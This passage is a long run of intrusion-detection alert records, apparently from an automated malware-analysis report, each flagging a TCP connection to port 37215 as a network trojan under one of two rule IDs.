          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.042801
          SID:2829579
          Source Port:48772
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.262123
          SID:2829579
          Source Port:36114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.039228
          SID:2835222
          Source Port:43250
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242754
          SID:2835222
          Source Port:54300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.019172
          SID:2829579
          Source Port:51152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.178368
          SID:2835222
          Source Port:46168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.794106
          SID:2829579
          Source Port:51206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.793450
          SID:2835222
          Source Port:50692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.787641
          SID:2829579
          Source Port:60772
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.846447
          SID:2829579
          Source Port:59006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729207
          SID:2835222
          Source Port:34860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.151472
          SID:2829579
          Source Port:35014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.162744
          SID:2835222
          Source Port:37944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.706252
          SID:2829579
          Source Port:60794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.824330
          SID:2829579
          Source Port:42768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.668586
          SID:2829579
          Source Port:45908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.843176
          SID:2835222
          Source Port:36764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.802838
          SID:2835222
          Source Port:49880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.063138
          SID:2835222
          Source Port:33226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.447029
          SID:2829579
          Source Port:54310
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.180604
          SID:2835222
          Source Port:59850
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.901405
          SID:2835222
          Source Port:33468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.177983
          SID:2829579
          Source Port:53324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.825009
          SID:2835222
          Source Port:54516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.306601
          SID:2829579
          Source Port:53438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.546500
          SID:2829579
          Source Port:33202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.796675
          SID:2835222
          Source Port:59660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.731421
          SID:2829579
          Source Port:52272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.146361
          SID:2835222
          Source Port:59540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.463465
          SID:2829579
          Source Port:42152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.786563
          SID:2829579
          Source Port:37706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.148605
          SID:2829579
          Source Port:42660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.021684
          SID:2829579
          Source Port:35464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107607
          SID:2829579
          Source Port:49454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.705329
          SID:2835222
          Source Port:44086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.892577
          SID:2829579
          Source Port:41478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.152738
          SID:2829579
          Source Port:41324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.471299
          SID:2835222
          Source Port:47168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.742236
          SID:2835222
          Source Port:35116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107880
          SID:2829579
          Source Port:40024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.551797
          SID:2829579
          Source Port:51010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.855172
          SID:2835222
          Source Port:58884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.460953
          SID:2829579
          Source Port:50530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.306490
          SID:2829579
          Source Port:55006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.019468
          SID:2829579
          Source Port:42304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.160360
          SID:2835222
          Source Port:45832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.271655
          SID:2835222
          Source Port:37358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351541
          SID:2829579
          Source Port:39700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.183942
          SID:2835222
          Source Port:45504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.178396
          SID:2835222
          Source Port:35380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.668460
          SID:2829579
          Source Port:53178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.794056
          SID:2829579
          Source Port:57892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.127425
          SID:2835222
          Source Port:45600
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.241117
          SID:2835222
          Source Port:53198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.781422
          SID:2829579
          Source Port:51814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.458018
          SID:2835222
          Source Port:58008
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.859552
          SID:2829579
          Source Port:49316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.352361
          SID:2835222
          Source Port:41656
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.353410
          SID:2835222
          Source Port:48338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.236830
          SID:2829579
          Source Port:53862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.792433
          SID:2835222
          Source Port:49172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.861397
          SID:2829579
          Source Port:36702
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.749225
          SID:2835222
          Source Port:58004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.238444
          SID:2835222
          Source Port:42728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.071221
          SID:2835222
          Source Port:40826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.466311
          SID:2835222
          Source Port:59510
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.510408
          SID:2835222
          Source Port:60612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.861828
          SID:2835222
          Source Port:38128
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.707015
          SID:2835222
          Source Port:50754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.273318
          SID:2835222
          Source Port:38742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.731729
          SID:2835222
          Source Port:54126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.405295
          SID:2835222
          Source Port:37956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.176570
          SID:2835222
          Source Port:44032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.178145
          SID:2829579
          Source Port:53570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.471336
          SID:2835222
          Source Port:55664
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.706616
          SID:2829579
          Source Port:33390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.378033
          SID:2835222
          Source Port:47102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.020771
          SID:2829579
          Source Port:53928
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.081691
          SID:2835222
          Source Port:36608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.745401
          SID:2829579
          Source Port:39600
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.895097
          SID:2829579
          Source Port:51266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.173168
          SID:2835222
          Source Port:43214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.236522
          SID:2835222
          Source Port:35824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.510272
          SID:2835222
          Source Port:57044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.511533
          SID:2835222
          Source Port:42520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.793253
          SID:2829579
          Source Port:57968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.130130
          SID:2835222
          Source Port:53638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.407786
          SID:2829579
          Source Port:44952
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.703588
          SID:2829579
          Source Port:57830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.014893
          SID:2829579
          Source Port:46802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.170614
          SID:2829579
          Source Port:58288
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.884381
          SID:2835222
          Source Port:54756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.043611
          SID:2829579
          Source Port:40520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.018273
          SID:2829579
          Source Port:48854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.114040
          SID:2829579
          Source Port:48458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.517789
          SID:2829579
          Source Port:53792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.404954
          SID:2835222
          Source Port:34224
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.179756
          SID:2835222
          Source Port:43186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.509790
          SID:2835222
          Source Port:36670
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.856978
          SID:2835222
          Source Port:55078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.819046
          SID:2835222
          Source Port:56222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.132332
          SID:2829579
          Source Port:55090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.175997
          SID:2835222
          Source Port:39684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.731861
          SID:2829579
          Source Port:58910
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108106
          SID:2829579
          Source Port:47906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.495854
          SID:2829579
          Source Port:38856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.603012
          SID:2829579
          Source Port:58332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.039140
          SID:2829579
          Source Port:55738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.789575
          SID:2829579
          Source Port:52118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159741
          SID:2835222
          Source Port:36680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.512758
          SID:2829579
          Source Port:58426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.074985
          SID:2835222
          Source Port:57738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.547462
          SID:2835222
          Source Port:38290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.035175
          SID:2835222
          Source Port:43042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108153
          SID:2829579
          Source Port:40738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274478
          SID:2829579
          Source Port:37454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.892384
          SID:2835222
          Source Port:42204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.243534
          SID:2835222
          Source Port:58036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.600058
          SID:2829579
          Source Port:45916
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.554433
          SID:2835222
          Source Port:47050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.066396
          SID:2829579
          Source Port:41380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108102
          SID:2829579
          Source Port:53778
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.784334
          SID:2829579
          Source Port:38498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.166616
          SID:2835222
          Source Port:47814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.177292
          SID:2829579
          Source Port:57362
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.259019
          SID:2835222
          Source Port:47036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.731245
          SID:2835222
          Source Port:58802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.041338
          SID:2829579
          Source Port:39040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.456237
          SID:2835222
          Source Port:54938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.709836
          SID:2835222
          Source Port:43126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.081196
          SID:2829579
          Source Port:42998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.467015
          SID:2829579
          Source Port:46830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.014691
          SID:2835222
          Source Port:40680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.667122
          SID:2835222
          Source Port:53260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.470525
          SID:2835222
          Source Port:51976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.150411
          SID:2829579
          Source Port:46688
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671409
          SID:2829579
          Source Port:33566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353844
          SID:2835222
          Source Port:37904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.599802
          SID:2829579
          Source Port:48476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.262106
          SID:2835222
          Source Port:56060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.162901
          SID:2829579
          Source Port:50802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.259612
          SID:2835222
          Source Port:36470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.463750
          SID:2835222
          Source Port:40186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.269936
          SID:2829579
          Source Port:36188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.470725
          SID:2835222
          Source Port:57518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731542
          SID:2829579
          Source Port:44582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.542937
          SID:2835222
          Source Port:50610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.740001
          SID:2829579
          Source Port:39912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.406566
          SID:2829579
          Source Port:38554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.067620
          SID:2835222
          Source Port:58242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.513596
          SID:2835222
          Source Port:54144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.260038
          SID:2829579
          Source Port:54626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.516726
          SID:2835222
          Source Port:47614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.157019
          SID:2829579
          Source Port:51130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.174026
          SID:2829579
          Source Port:48184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465451
          SID:2829579
          Source Port:34130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.734369
          SID:2835222
          Source Port:35422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159698
          SID:2835222
          Source Port:43126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.111903
          SID:2835222
          Source Port:57074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.812663
          SID:2829579
          Source Port:55758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.511035
          SID:2829579
          Source Port:42712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354904
          SID:2829579
          Source Port:47182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.512434
          SID:2835222
          Source Port:43972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.236817
          SID:2829579
          Source Port:54768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912012
          SID:2829579
          Source Port:60362
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.731914
          SID:2829579
          Source Port:44324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160045
          SID:2835222
          Source Port:50258
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671083
          SID:2835222
          Source Port:50178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.887318
          SID:2829579
          Source Port:43770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.834487
          SID:2835222
          Source Port:34840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.816863
          SID:2829579
          Source Port:46358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.071074
          SID:2829579
          Source Port:52828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.850706
          SID:2835222
          Source Port:58570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461725
          SID:2829579
          Source Port:33944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.784015
          SID:2835222
          Source Port:43100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.044170
          SID:2835222
          Source Port:55296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.888761
          SID:2829579
          Source Port:46162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.673747
          SID:2829579
          Source Port:52386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.518136
          SID:2835222
          Source Port:44508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.854646
          SID:2835222
          Source Port:35632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.084988
          SID:2829579
          Source Port:56958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446258
          SID:2829579
          Source Port:57638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.460937
          SID:2835222
          Source Port:57576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.262391
          SID:2835222
          Source Port:43368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731683
          SID:2829579
          Source Port:57632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108042
          SID:2829579
          Source Port:48350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.602918
          SID:2829579
          Source Port:52820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.113749
          SID:2835222
          Source Port:33746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465617
          SID:2829579
          Source Port:41390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.843718
          SID:2829579
          Source Port:48140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.512623
          SID:2829579
          Source Port:33044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.445926
          SID:2829579
          Source Port:46202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.078469
          SID:2829579
          Source Port:33198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.178662
          SID:2835222
          Source Port:60454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353825
          SID:2829579
          Source Port:46640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.152364
          SID:2835222
          Source Port:41562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.468222
          SID:2835222
          Source Port:41550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
